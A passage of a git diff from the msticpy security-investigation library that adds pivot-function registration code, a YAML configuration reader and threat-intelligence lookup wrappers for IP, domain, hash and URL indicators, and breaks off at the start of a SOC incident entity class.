+        for step in self.steps:
+            exec_action = step.get_exec_step()
+            if comments:
+                step_list.append(f"    # {step.comment or step.name}")
+            step_list.append(f"    {exec_action.text}")
+        step_list.append(")")
+        return "\n".join(step_list)
diff --git a/msticpy/datamodel/pivot_register.py b/msticpy/datamodel/pivot_register.py
new file mode 100644
index 000000000..cd36abdc9
--- /dev/null
+++ b/msticpy/datamodel/pivot_register.py
@@ -0,0 +1,564 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Pivot helper functions ."""
+from collections import abc
+from functools import wraps
+from typing import Any, Callable, Dict, Optional, Tuple, Union
+import warnings
+
+import attr
+import pandas as pd
+
+from .._version import VERSION
+from . import entities
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+_DF_SRC_COL_PARAM_NAMES = [
+    "column",
+    "input_column",
+    "input_col",
+    "src_column",
+    "src_col",
+]
+
+
+@attr.s(auto_attribs=True)
+class PivotRegistration:
+    """
+    Pivot registration for function.
+
+    Notes
+    -----
+    src_module : str
+        The src_module to import
+    src_class : str, optional
+        class to import and instantiate that contains the function/method
+        (not needed if the target function is a pure Python function)
+    src_func_name: Callable
+        The function to wrap.
+    func_new_name: str, optional
+        Rename the function to this, defaults to `src_func_name`
+    input_type : str
+        The input data type that the function is expecting.
+        One of 'dataframe', 'iterable', 'value'
+    can_iterate: bool, optional
+        True if the function supports being called multiple times
+        (for iterable input). Default is True
+    entity_map: Dict[str, str]
+        dict of entities supported (keys) and attribute to use from
+        entity as input to the function
+    func_df_param_name: str
+        The name of the parameter that `func` takes the input value
+        e.g. func(ip=my_address) => 'ip' == func_df_col_param_name.
+        In the case of a DataFrame, this is usually 'data'
+    func_df_col_param_name: str
+        The name that the target function uses to identify the
+        column to use for input in the input DataFrame.
+    func_out_column_name: str, optional
+        The name of the column in the output DF to use as a key to join
+        to the input. If None, use `func_df_col_param_name`
+    func_static_params: Optional[Dict[str, Any]]
+        static parameters (kwargs) that are always passed
+        to the target function
+    func_input_value_arg: Optional[str]
+        The name of kwarg passed to the function that contain
+        the input value. If function supports DF input, `func_df_col_param_name`
+        will be used and this is not needed.
+    src_config_path : Optional[str]
+        The source path that the configuration was read from, default None.
+    src_config_entry : Optional[str]
+        The entry name in the configuration file, default None.
+    entity_container_name : Optional[str]
+        The name of the container in the entity that will hold
+        this pivot function.
+    return_raw_output : bool
+        Return raw output from the wrapped function, do not
+        try to format into a DataFrame. Default is False.
+    create_shortcut : bool
+        If True, create a shortcut function directly on the entity.
+
+    """
+
+    input_type: str
+    entity_map: Dict[str, str]
+    func_df_param_name: Optional[str] = None
+    func_out_column_name: Optional[str] = None
+    func_df_col_param_name: Optional[str] = None
+    func_new_name: Optional[str] = None
+    src_module: Optional[str] = None
+    src_class: Optional[str] = None
+    src_func_name: Optional[str] = None
+    can_iterate: bool = True
+    func_static_params: Optional[Dict[str, Any]] = None
+    func_input_value_arg: Optional[str] = None
+    src_config_path: Optional[str] = None
+    src_config_entry: Optional[str] = None
+    entity_container_name: Optional[str] = None
+    return_raw_output: bool = False
+    create_shortcut: bool = False
+
+    def attr_for_entity(self, entity: Union[entities.Entity, str]) -> Optional[str]:
+        """
+        Return the attribute to use for the specified entity.
+
+        Parameters
+        ----------
+        entity : Union[entities.Entity, str]
+            Entity instance or name
+
+        Returns
+        -------
+        Optional[str]
+            Attribute name to use.
+
+        """
+        if isinstance(entity, entities.Entity):
+            ent_name = entity.__class__.__name__
+        else:
+            ent_name = entity
+        return self.entity_map.get(ent_name)
+
+
+def create_pivot_func(
+    target_func: Callable[[Any], Any],
+    pivot_reg: PivotRegistration,
+) -> Callable[..., pd.DataFrame]:
+    """
+    Create function wrapper for pivot function.
+
+    Parameters
+    ----------
+    target_func: Callable
+        The target function to wrap.
+    pivot_reg : PivotRegistration
+        The pivot function registration object.
+
+    Returns
+    -------
+    Callable[[Any], pd.DataFrame]
+        The original `target_func` wrapped in pre-processing
+        and post-processing code.
+
+    """
+
+    @wraps(target_func)
+    def pivot_lookup(*args, **kwargs) -> pd.DataFrame:
+        """
+        Lookup Pivot function from Entity or parameter values.
+
+        Parameters
+        ----------
+        data: Union[str, List[str], pd.DataFrame]
+            Not used if querying the entity value itself
+
+        Returns
+        -------
+        pd.DataFrame
+            DataFrame of Pivot function results.
+
+        """
+        # remove and save the join kw, if specified (so it doesn't interfere
+        # with other operations and doesn't get sent to the function)
+        join_type, left_on, right_on, j_ignore_case = get_join_params(kwargs)
+
+        input_value = _get_input_value(*args, pivot_reg=pivot_reg, parent_kwargs=kwargs)
+        _check_valid_settings_for_input(input_value, pivot_reg)
+
+        # If the input_value is not a DF convert it into one and return the DF,
+        # the column with the input value(s) plus the param dict that we're going
+        # to send to the function. This is going to look like:
+        # {"data": input_df, "src_column": input_column}
+        input_df, input_column, param_dict = _create_input_df(
+            input_value, pivot_reg, parent_kwargs=kwargs
+        )
+
+        # Add any static parameters for the function to our params dict
+        param_dict.update(pivot_reg.func_static_params or {})
+
+        # Call the target function and collect the results
+        if pivot_reg.input_type == "value":
+            if not pivot_reg.can_iterate and len(input_df) > 1:
+                raise TypeError(
+                    "The function does not support multiple input values.",
+                    "Try again with a single row/value as input.",
+                    "E.g. func(data=df.iloc[N], column=...)",
+                )
+            result_df = _iterate_func(
+                target_func, input_df, input_column, pivot_reg, **kwargs
+            )
+        else:
+            result_df = target_func(**param_dict, **kwargs)  # type: ignore
+        merge_key = pivot_reg.func_out_column_name or input_column
+
+        # If requested to join to input
+        # and this function is returning a DataFrame
+        if join_type and not pivot_reg.return_raw_output:
+            left_on = left_on or input_column
+            right_on = right_on or merge_key
+            return join_result(
+                input_df=input_df,
+                result_df=result_df,
+                how=join_type,
+                left_on=left_on,
+                right_on=right_on,
+                ignore_case=j_ignore_case,
+            ).drop(columns="src_row_index", errors="ignore")
+        return result_df
+
+    setattr(
+        pivot_lookup,
+        "pivot_properties",
+        attr.asdict(pivot_reg, filter=(lambda _, val: val is not None)),
+    )
+    return pivot_lookup
+
+
+def get_join_params(
+    func_kwargs: Dict[str, Any]
+) -> Tuple[Optional[str], Optional[str], Optional[str], bool]:
+    """
+    Get join parameters from kwargs.
+
+    Parameters
+    ----------
+    func_kwargs : Dict[str, Any]
+        Keyword arguments from caller
+
+    Returns
+    -------
+    Tuple[str, str, str, bool]
+        join_type, left_on, right_on, join_ignore_case
+
+    """
+    # remove and save the join kw, if specified (so it doesn't interfere
+    # with other operations and doesn't get sent to the function)
+    join_type = func_kwargs.pop("join", None)
+    join_ignore_case = func_kwargs.pop("join_ignore_case", None)
+    if not join_type:
+        return None, None, None, False
+    left_on = func_kwargs.pop("left_on", None)
+    right_on = func_kwargs.pop("right_on", None)
+    if left_on and not right_on:
+        warnings.warn(
+            "If you are specifying explicit join keys "
+            "you must specify 'right_on' parameter with the "
+            + "name of the output column to join on. "
+            + "Results will joined on index."
+        )
+    if not left_on:
+        col_keys = list(func_kwargs.keys() - {"start", "end", "data"})
+        if len(col_keys) == 1:
+            # Only one input param so assume this is the src/left
+            # join key
+            left_on = func_kwargs.get(col_keys[0])
+
+    if right_on and not left_on:
+        warnings.warn(
+            "Could not infer 'left' join column from source data. "
+            + "Please specify 'left_on' parameter with the "
+            + "name of the source column to join on. "
+            + "Results will joined on index."
+        )
+    return join_type, left_on, right_on, join_ignore_case
+
+
+def join_result(
+    input_df: pd.DataFrame,
+    result_df: pd.DataFrame,
+    how: str,
+    left_on: str,
+    right_on: str,
+    ignore_case: bool,
+) -> pd.DataFrame:
+    """
+    Join input and result DFs, optionally ignoring case.
+
+    Parameters
+    ----------
+    input_df : pd.DataFrame
+        Input DF
+    result_df : pd.DataFrame
+        Result DF
+    how : str
+        Join type - "inner", "left", "right", "outer"
+    left_on : str
+        Column from `input_df` to use as join key
+    right_on : str
+        Column from `result_df` to use as join key
+    ignore_case : bool
+        If True and input_df column is a string
+
+    Returns
+    -------
+    pd.DataFrame
+        The merged DataFrame
+
+    """
+    if not ignore_case or input_df[left_on].dtype.name not in (
+        "string",
+        "object",
+    ):
+        # Not requested case-insensitive join OR input column is
+        # not a string/object
+        return input_df.merge(
+            result_df,
+            left_on=left_on,
+            right_on=right_on,
+            how=how,
+            suffixes=("_src", "_res"),
+        )
+
+    # We need to join case-insensitive
+    left_on = f"{left_on}_lc"
+    input_df[left_on] = input_df[left_on].str.casefold()
+    right_on = f"{right_on}_lc"
+    result_df[right_on] = result_df[right_on].astype("string").str.casefold()
+    return input_df.merge(
+        result_df,
+        left_on=left_on,
+        right_on=right_on,
+        how=how,
+        suffixes=("_src", "_res"),
+    ).drop(columns=[left_on, right_on])
+
+
+def _get_entity_attr_or_self(obj, attrib):
+    """Return entity attribute or obj if not an entity."""
+    if isinstance(obj, entities.Entity):
+        return getattr(obj, attrib)
+    return obj
+
+
+def _get_input_value(
+    *args, pivot_reg: PivotRegistration, parent_kwargs: Dict[str, Any]
+) -> Any:
+    """Extract input value from args or kwargs."""
+    if args:
+        input_value = args[0]
+    else:
+        # Search possible input arg names
+        poss_args = [
+            arg
+            for arg in [
+                pivot_reg.func_df_param_name,
+                pivot_reg.func_input_value_arg,
+                "value",
+                "data",
+                "input",
+            ]
+            if arg
+        ]
+        for arg_name in poss_args:
+            input_value = parent_kwargs.pop(arg_name, None)
+            if input_value is not None:
+                break
+        else:
+            raise AttributeError(
+                "Required keyword argument not found.",
+                f"One of {', '.join(poss_args)} required.",
+            )
+    if isinstance(input_value, entities.Entity):
+        src_entity_attrib = pivot_reg.attr_for_entity(input_value)
+        input_value = _get_entity_attr_or_self(input_value, src_entity_attrib)
+    return input_value
+
+
+def _check_valid_settings_for_input(input_value: Any, pivot_reg: PivotRegistration):
+    """Check input against settings in `pivot_reg`."""
+    # Must have one of these specified
+    if not (pivot_reg.func_df_col_param_name or pivot_reg.func_input_value_arg):
+        raise ValueError(
+            "A value for one of 'func_df_col_param_name' ",
+            "or 'func_input_value_arg' must be given",
+        )
+    # If the function accepts only value type and cannot iterate. Make sure
+    # that the input_value is a simple value
+    if pivot_reg.input_type == "value":
+        if not pivot_reg.func_input_value_arg:
+            raise ValueError("No value for pivot func input argument was given")
+        if not pivot_reg.can_iterate and (
+            isinstance(input_value, pd.DataFrame)
+            or (
+                # pylint: disable=isinstance-second-argument-not-valid-type
+                isinstance(input_value, pd.DataFrame)
+                and not isinstance(input_value, str)
+                # pylint: enable=isinstance-second-argument-not-valid-type
+            )
+        ):
+            raise ValueError(
+                f"This function does not accept inputs of {type(input_value)}"
+            )
+
+
+def _arg_to_dframe(arg_val, col_name: str = "param_value"):
+    """
+    Convert a scalar or Iterable value to a DataFrame.
+
+    Parameters
+    ----------
+    arg_val: Any
+        The value to be converted
+    col_name: Optional[str]
+        The name to assign to the DataFrame column
+
+    Returns
+    -------
+    pd.DataFrame
+        The resulting DataFrame
+
+    Notes
+    -----
+    If `arg_val` is already a DataFrame it is returned as is.
+
+    """
+    if isinstance(arg_val, pd.DataFrame):
+        return arg_val
+    if isinstance(arg_val, str) or not isinstance(arg_val, abc.Iterable):
+        return pd.DataFrame([arg_val], columns=[col_name])
+    return pd.DataFrame(arg_val, columns=[col_name])
+
+
+def _create_input_df(input_value, pivot_reg, parent_kwargs):
+    """Create input_df and params from input."""
+    # If input_value type is not already a dataframe, convert it.
+    # If the DF column param is specified, use that or fall back
+    # to using the function input value arg.
+    input_column = pivot_reg.func_df_col_param_name or pivot_reg.func_input_value_arg
+    # If input_value is already a DF, this call just returns the original DF
+    input_df = _arg_to_dframe(input_value, input_column)  # type: ignore
+
+    if isinstance(input_value, pd.DataFrame):
+        # If the original input_value is a DataFrame
+        # try to find the column name specification in kwargs
+        for col_param in (
+            pivot_reg.func_df_col_param_name,
+            pivot_reg.func_input_value_arg,
+            *_DF_SRC_COL_PARAM_NAMES,
+        ):
+            if col_param in parent_kwargs and parent_kwargs[col_param] in input_df:
+                input_column = parent_kwargs.pop(col_param)
+                break
+        else:
+            col_arg = parent_kwargs.pop(col_param, None)
+            col_arg = f" '{col_arg}' " if col_arg else ""
+            col_mssg = f"The column name {col_arg} given for the 'column' parameter"
+            raise KeyError(
+                f"'{col_mssg}' is not in the input dataframe",
+                "Please specify the column when calling the function."
+                "You can use one of these parameter names for this:",
+                _DF_SRC_COL_PARAM_NAMES,
+            )
+    # we want to get rid of data=xyz parameters from kwargs, since we're adding them
+    # below
+    parent_kwargs.pop("data", None)
+    parent_kwargs.pop(pivot_reg.func_df_param_name, None)
+
+    if input_column not in input_df:
+        raise KeyError(f"'{input_column}' is not in the input dataframe")
+    if input_column:
+        param_dict = {
+            pivot_reg.func_df_param_name: input_df,
+            pivot_reg.func_df_col_param_name: input_column,
+        }
+    else:
+        # If no column was specified, the user will have to specify
+        # this in the call to the method - we just add the DF parameter
+        param_dict = {pivot_reg.func_df_param_name: input_df}
+    return input_df, input_column, param_dict
+
+
+def _iterate_func(target_func, input_df, input_column, pivot_reg, **kwargs):
+    """Call `target_func` function with values of each row in `input_df`."""
+    results = []
+    # Add any static parameters to all_rows_kwargs
+    all_rows_kwargs = kwargs.copy()
+    all_rows_kwargs.update((pivot_reg.func_static_params or {}))
+    res_key_col_name = pivot_reg.func_out_column_name or pivot_reg.func_input_value_arg
+
+    for row_index, row in enumerate(input_df[[input_column]].itertuples(index=False)):
+        # Get rid of any conflicting arguments from kwargs
+        func_kwargs = all_rows_kwargs.copy()
+        func_kwargs.pop(pivot_reg.func_input_value_arg, None)
+        # Create a param dictionary with the value parameter for this row
+        param_dict = {pivot_reg.func_input_value_arg: row[0]}
+        # run the function
+        result = target_func(**param_dict, **all_rows_kwargs)
+
+        # Process the output, if it is a DataFrame
+        if not pivot_reg.return_raw_output and not isinstance(result, pd.DataFrame):
+            col_value = next(iter(row._asdict().values()))
+            if isinstance(result, dict):
+                # if result is a dict - make that into a row.
+                result = pd.DataFrame(pd.Series(result)).T
+                result[res_key_col_name] = col_value
+            else:
+                # just make the result into a string and use that as a single col
+                result = pd.DataFrame(
+                    [[col_value, str(result)]], columns=[res_key_col_name, "result"]
+                )
+            result["src_row_index"] = row_index
+        results.append(result)
+    if pivot_reg.return_raw_output:
+        if len(results) == 1:
+            return results[0]
+        return results
+    return pd.concat(results, ignore_index=True)
+
+
+# _PARENT_SELF = "parent_self"
+
+
+# def query_cont_member_wrap(func: Callable[[Any], Any]) -> Callable[[Any], Any]:
+#     """
+#     Wrap a func to work as instance method in a QueryContainer.
+
+#     Parameters
+#     ----------
+#     func : Callable[[Any], Any]
+#         Function to wrap as method
+
+#     Returns
+#     -------
+#     Callable[[Any], Any]
+#         Wrapped function
+
+#     Notes
+#     -----
+#     This is designed to be used inside a `QueryContainer`. The wrapped
+#     function checks to see if its arg[0] is a QueryContainer - meaning
+#     it has been called as an instance function of that class.
+#     If so, and the parent class has a _parent_self attribute, it will
+#     replace the original arg[0] (the self of QueryContainer) with
+#     the self of the containing class (_parent_self).
+#     It relies containing class setting `_parent_self` as an attribute
+#     in any QueryContainer attributes that it has. The msticpy Entity
+#     class does this.
+
+#     If these conditions don't apply it simply passed through the call
+#     to the original function.
+
+#     See Also
+#     --------
+#     QueryContainer
+#     Entity
+
+#     """
+
+#     @wraps(func)
+#     def _wrapped_member(*args, **kwargs):
+#         if (
+#             args
+#             and args[0].__class__.__name__ == "QueryContainer"
+#             and hasattr(args[0], _PARENT_SELF)
+#         ):
+#             parent_self = getattr(args[0], _PARENT_SELF)
+#             return func(parent_self, *args[1:], **kwargs)
+#         return func(*args, **kwargs)
+
+#     return _wrapped_member
diff --git a/msticpy/datamodel/pivot_register_reader.py b/msticpy/datamodel/pivot_register_reader.py
new file mode 100644
index 000000000..c077938dd
--- /dev/null
+++ b/msticpy/datamodel/pivot_register_reader.py
@@ -0,0 +1,215 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Reads pivot registration config files."""
+import importlib
+from typing import Any, Callable, Dict, Type
+import warnings
+
+import yaml
+
+from .._version import VERSION
+from ..common.exceptions import (
+    MsticpyUserConfigError,
+    MsticpyException,
+    MsticpyUserError,
+)
+from ..data.query_container import QueryContainer
+from . import entities
+from .pivot_register import PivotRegistration, create_pivot_func
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def register_pivots(  # noqa: MC0001
+    file_path: str,
+    namespace: Dict[str, Any] = None,
+    container: str = "other",
+    force_container: bool = False,
+    **kwargs,
+):
+    """
+    Register pivot functions from configuration file.
+
+    Parameters
+    ----------
+    file_path : str
+        Path to config yaml file
+    namespace : Dict[str, Any], optional
+        Namespace to search for existing instances of classes, by default None
+    container : str, optional
+        Container name to use for entity pivot functions, by default "other"
+    force_container : bool, optional
+        Force `container` value to be used even if entity definitions have
+        specific setting for a container name, by default False
+
+    Raises
+    ------
+    ValueError
+        An entity specified in the config file is not recognized.
+
+    """
+    for piv_reg in _read_reg_file(file_path):
+        if "debug" in kwargs:
+            print(piv_reg)
+
+        func = None
+        if not piv_reg.src_module:
+            raise ValueError(
+                f"{piv_reg.src_config_entry} had no 'src_module' value in",
+                piv_reg.src_config_path,
+            )
+
+        # try to import the module and retrieve the function
+        try:
+            src_module = importlib.import_module(piv_reg.src_module)
+        except ImportError:
+            print(
+                f"Unable to add pivot functions from module '{piv_reg.src_module}'. Skipping"
+            )
+            continue
+        if piv_reg.src_class:
+            # if we need to get this from a class/object we need
+            # to find or create one.
+            func = None
+            # Suppress Msticpy exception display when instantiating classes.
+            with MsticpyUserError.no_display_exceptions():
+                try:
+                    func = _get_func_from_class(src_module, namespace, piv_reg)
+                except MsticpyException:
+                    print(
+                        f"Unable to add pivot functions from class '{piv_reg.src_class}'. Skipping"
+                    )
+            if not func:
+                continue
+        else:
+            # not a class, just get the function from the module
+            func = getattr(src_module, piv_reg.src_func_name, None)
+
+        if not func:
+            raise ValueError(
+                f"Could not find function {piv_reg.src_func_name}",
+                piv_reg.src_config_entry,
+                piv_reg.src_config_path,
+            )
+        # create the pivot function and add to each entity
+        if force_container:
+            q_container = container
+        else:
+            q_container = piv_reg.entity_container_name or container
+        _add_func_to_entities(func, piv_reg, q_container, **kwargs)
+
+
+def add_unbound_pivot_function(
+    func: Callable[[Any], Any],
+    pivot_reg: PivotRegistration = None,
+    container: str = "other",
+    **kwargs,
+):
+    """
+    Add a pivot function to entities.
+
+    Parameters
+    ----------
+    func : Callable[[Any], Any]
+        The function to add
+    pivot_reg : PivotRegistration, optional
+        Pivot registration object, by default None
+    container : str, optional
+        The name of the container into which the function
+        should be added, by default "other"
+
+    Other Parameters
+    ----------------
+    kwargs
+        If `pivot_reg` is not supplied you can specify required
+        pivot registration parameters via keyword arguments. You must
+        specify `input_type` (str) and `entity_map` (dict of entity_name,
+        entity_attribute pairs)
+
+    See Also
+    --------
+    PivotRegistration
+
+    """
+    if pivot_reg is None:
+        pivot_reg = PivotRegistration(**kwargs)
+    _add_func_to_entities(func, piv_reg=pivot_reg, container=container, **kwargs)
+
+
+def _read_reg_file(file_path: str):
+    """Read the yaml file and return generator of PivotRegistrations."""
+    with open(file_path, "r", encoding="utf-8") as f_handle:
+        # use safe_load instead load
+        pivot_regs = yaml.safe_load(f_handle)
+
+    for entry_name, settings in pivot_regs.get("pivot_providers").items():
+        try:
+            yield PivotRegistration(
+                src_config_path=file_path, src_config_entry=entry_name, **settings
+            )
+        except TypeError as err:
+            raise MsticpyUserConfigError(
+                "One or more missing fields found in pivot defintion.",
+                f"Source file: {file_path}",
+                title=f"Error importing pivot definition {entry_name}",
+            ) from err
+
+
+def _add_func_to_entities(func, piv_reg, container, **kwargs):
+    """Create the pivot function and add to entities."""
+    pivot_func = create_pivot_func(func, piv_reg)
+
+    for entity_name in piv_reg.entity_map:
+        entity = getattr(entities, entity_name, None)
+        if not entity:
+            raise ValueError(f"Unrecognized entity {entity_name}")
+        query_container = getattr(entity, container, None)
+        if not query_container:
+            query_container = QueryContainer()
+            setattr(entity, container, query_container)
+        func_name = piv_reg.func_new_name or piv_reg.src_func_name
+        setattr(query_container, func_name, pivot_func)
+
+        if piv_reg.create_shortcut:
+            setattr(entity, func_name, pivot_func)
+
+        if "debug" in kwargs:
+            print(
+                entity_name,
+                [func for func in dir(entity.other) if not func.startswith("_")],
+            )
+
+
+def _get_func_from_class(src_module, namespace, piv_reg):
+    """Return function from class instance - created or found in namespace."""
+    # If this is a class instance method, we need to have
+    # an instance of the class
+    src_class = getattr(src_module, piv_reg.src_class)
+    src_obj = None
+    # If a namespace was passed, look for an already-created
+    # object of this type
+    if namespace:
+        src_obj = _last_instance_of_type(src_class, namespace)
+    if not src_obj:
+        try:
+            src_obj = src_class()
+        except Exception as err:  # pylint: disable=broad-except
+            warnings.warn(
+                f"Could not create instance of class {src_class.__name__}. "
+                + f"Exception was {err}"
+            )
+            return None
+    # get the function from the object
+    return getattr(src_obj, piv_reg.src_func_name, None)
+
+
+def _last_instance_of_type(var_type: Type, namespace: Dict[str, Any]):
+    """Return the most recently created instance of type in namespace."""
+    matches = [var for _, var in namespace.items() if isinstance(var, var_type)]
+    if matches:
+        return matches[-1]
+    return None
diff --git a/msticpy/datamodel/pivot_ti_provider.py b/msticpy/datamodel/pivot_ti_provider.py
new file mode 100644
index 000000000..ceb7bcb25
--- /dev/null
+++ b/msticpy/datamodel/pivot_ti_provider.py
@@ -0,0 +1,204 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Pivot TI Provider helper functions."""
+from collections import defaultdict
+from typing import Callable, Dict, Optional, Set, Tuple, Type
+
+import pandas as pd
+
+from .._version import VERSION
+from ..data.query_container import QueryContainer
+from ..sectools.tilookup import TILookup
+from ..sectools.tiproviders.ti_provider_base import TIPivotProvider
+from . import entities
+from .pivot_register import PivotRegistration, create_pivot_func
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+IOC_TYPES = {"ipv4", "ipv6", "dns", "file_hash", "url"}
+
+TI_ENTITY_ATTRIBS: Dict[str, Tuple[Type, str]] = {
+    "ipv4": (entities.IpAddress, "Address"),
+    "ipv6": (entities.IpAddress, "Address"),
+    "ip": (entities.IpAddress, "Address"),
+    "dns": (entities.Dns, "DomainName"),
+    "file_hash": (entities.File, "file_hash"),
+    "file_path": (entities.File, "file_hash"),
+    "url": (entities.Url, "Url"),
+}
+
+
+def add_ioc_queries_to_entities(ti_lookup: TILookup, container: str = "ti", **kwargs):
+    """
+    Add TI functions to entities.
+
+    Parameters
+    ----------
+    ti_lookup : TILookup
+        TILookup instance.
+    container : str
+        The name of the container to add query functions to
+
+    """
+    ioc_queries = create_ti_pivot_funcs(ti_lookup)
+    for ioc, ioc_funcs in ioc_queries.items():
+        if "debug" in kwargs:
+            print(ioc, ioc_funcs)
+        entity, _ = TI_ENTITY_ATTRIBS[ioc]
+        if entity:
+            for f_name, func in ioc_funcs.items():
+                if "debug" in kwargs:
+                    print(ioc, f_name, func)
+                query_container = getattr(entity, container, None)
+                if not query_container:
+                    query_container = QueryContainer()
+                    setattr(entity, container, query_container)
+                setattr(query_container, f_name, func)
+
+                # Create shortcuts for non-provider-specific funcs
+                if f_name.endswith(ioc):
+                    short_func_name = f"ti{f_name}"
+                    setattr(entity, short_func_name, func)
+
+
+def create_ti_pivot_funcs(ti_lookup: TILookup):
+    """Create the TI Pivot functions."""
+    ioc_type_supp = _get_supported_ioc_types(ti_lookup)
+    ioc_queries: Dict[str, Dict[str, Callable[..., pd.DataFrame]]] = defaultdict(dict)
+
+    # Add functions for ioc types that will call all providers
+    # Non-IP types
+    ioc_queries.update(_get_non_ip_functions(ioc_type_supp, ti_lookup))
+    # Special case for ipv4 and ipv6 - we want to merge these into "ip" if these are equivalent
+    ioc_queries.update(_get_ip_functions(ioc_type_supp, ti_lookup))
+
+    # Add functions for provider-specific lookup function names
+    # These have a "_provider_name" suffix
+    for prov, ioc_set in ioc_type_supp.items():
+        for ioc in ioc_set:
+            ioc_name = _merged_ip_ioc_type(ioc, ti_lookup.loaded_providers.get(prov))
+            if not ioc_name:
+                continue
+            _, func_name, func = _create_lookup_func(ti_lookup, ioc, ioc, [prov])
+            func_name = f"{func_name}_{prov}"
+            ioc_queries[ioc][func_name] = func
+    return ioc_queries
+
+
+def register_ti_pivot_providers(ti_lookup: TILookup, pivot: "Pivot"):  # type: ignore # noqa: F821
+    """Register pivot functions from TI providers."""
+    for _, ti_prov in ti_lookup.loaded_providers.items():
+        if isinstance(ti_prov, TIPivotProvider):
+            ti_prov.register_pivots(PivotRegistration, pivot)
+
+
+def _get_supported_ioc_types(ti_lookup: TILookup) -> Dict[str, Set[str]]:
+    return {
+        ti_prov_name: set(ti_prov.supported_types) & IOC_TYPES
+        for ti_prov_name, ti_prov in ti_lookup.loaded_providers.items()
+    }
+
+
+def _prov_ipv4v6_equal(ti_provider) -> bool:
+    if not ti_provider:
+        return False
+    ti_queries = ti_provider.ioc_query_defs
+    return ti_queries.get("ipv4") is not None and (
+        ti_queries.get("ipv6") is None
+        or ti_queries.get("ipv4") == ti_queries.get("ipv6")
+    )
+
+
+def _merged_ip_ioc_type(ioc, ti_provider) -> Optional[str]:
+    if ioc == "ipv4" and _prov_ipv4v6_equal(ti_provider):
+        return "ip"
+    if ioc == "ipv6" and _prov_ipv4v6_equal(ti_provider):
+        return None
+    return ioc
+
+
+def _create_lookup_func(
+    ti_lookup: TILookup, ioc, ioc_name, providers
+) -> Tuple[str, str, Callable[..., pd.DataFrame]]:
+
+    suffix = f"_{ioc_name}"
+    short_func_name = f"lookup{suffix}"
+    func_name = f"{short_func_name}_{ioc_name}"
+    params_dict = {"providers": providers, "ioc_type": ioc}
+
+    entity_cls, entity_attr = TI_ENTITY_ATTRIBS[ioc]
+
+    pivot_reg = PivotRegistration(
+        src_func_name=ti_lookup.lookup_iocs.__name__,
+        input_type="dataframe",
+        entity_map={entity_cls.__name__: entity_attr},
+        func_df_param_name="data",
+        func_df_col_param_name="obs_col",
+        func_out_column_name="Ioc",
+        func_static_params=params_dict,
+    )
+    return (
+        func_name,
+        short_func_name,
+        create_pivot_func(target_func=ti_lookup.lookup_iocs, pivot_reg=pivot_reg),
+    )
+
+
+def _get_non_ip_functions(ioc_type_supp, ti_lookup):
+    """Get functions for non-IP IoC types."""
+    ioc_queries = defaultdict(dict)
+    for ioc in IOC_TYPES - {"ipv4", "ipv6"}:
+        supporting_provs = [
+            prov for prov, supp_types in ioc_type_supp.items() if ioc in supp_types
+        ]
+        _, func_name, func = _create_lookup_func(ti_lookup, ioc, ioc, supporting_provs)
+        ioc_queries[ioc][func_name] = func
+    return ioc_queries
+
+
+def _get_ip_functions(ioc_type_supp, ti_lookup):
+    """Get functions for IP IoC Types."""
+    # Special case for ipv4 and ipv6
+    # we want to merge these into "ip" if these are equivalent
+    ioc_queries = defaultdict(dict)
+    # Special case for ipv4 and ipv6 - we want to merge these into "ip" if these are equivalent
+    ip_types = {"ipv4", "ipv6"}
+    ip_all_provs = [
+        prov for prov, supp_types in ioc_type_supp.items() if ip_types & supp_types
+    ]
+
+    # Register providers where IP v4 and v6 are equivalent, or only support ipv4, as "ip"
+    ip_gen_provs = [
+        prov
+        for prov in ip_all_provs
+        if _prov_ipv4v6_equal(ti_lookup.loaded_providers.get(prov))
+        or "ipv6" not in ioc_type_supp[prov]
+    ]
+
+    _, func_name, func = _create_lookup_func(ti_lookup, "ipv4", "ip", ip_gen_provs)
+    ioc_queries["ip"][func_name] = func
+
+    # Also register IP v4 and v6 specific queries
+    ip_v4_provs = [
+        prov
+        for prov in ip_all_provs
+        if "ipv4" in ioc_type_supp[prov]
+        if prov not in ip_gen_provs
+    ]
+    _, func_name, func = _create_lookup_func(ti_lookup, "ipv4", "ipv4", ip_v4_provs)
+    ioc_queries["ipv4"][func_name] = func
+
+    ip_v6_provs = [
+        prov
+        for prov in ip_all_provs
+        if "ipv6" in ioc_type_supp[prov]
+        if prov not in ip_gen_provs
+    ]
+    _, func_name, func = _create_lookup_func(ti_lookup, "ipv6", "ipv6", ip_v6_provs)
+    ioc_queries["ipv6"][func_name] = func
+
+    return ioc_queries
diff --git a/msticpy/datamodel/soc/__init__.py b/msticpy/datamodel/soc/__init__.py
new file mode 100644
index 000000000..0e45b252c
--- /dev/null
+++ b/msticpy/datamodel/soc/__init__.py
@@ -0,0 +1,10 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""SOC Entity sub-package."""
+
+# flake8: noqa: F401
+from .incident import Incident
+from .sentinel_alert import SentinelAlert
diff --git a/msticpy/datamodel/soc/incident.py b/msticpy/datamodel/soc/incident.py
new file mode 100644
index 000000000..38ac0a035
--- /dev/null
+++ b/msticpy/datamodel/soc/incident.py
@@ -0,0 +1,167 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Incident Entity class."""
+from typing import Any, List, Mapping, Optional, Dict
+import pandas as pd
+
+from ..._version import VERSION
+from ...common.utility import export
+from ..entities.entity import Entity, camelcase_property_names
+from ..entities.alert import Alert
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+
+# pylint: disable=invalid-name, too-many-instance-attributes
+@export
+class Incident(Entity):
+    """Incident Entity class."""
+
+    ID_PROPERTIES = ["IncidentID"]
+
+    def __init__(
+        self,
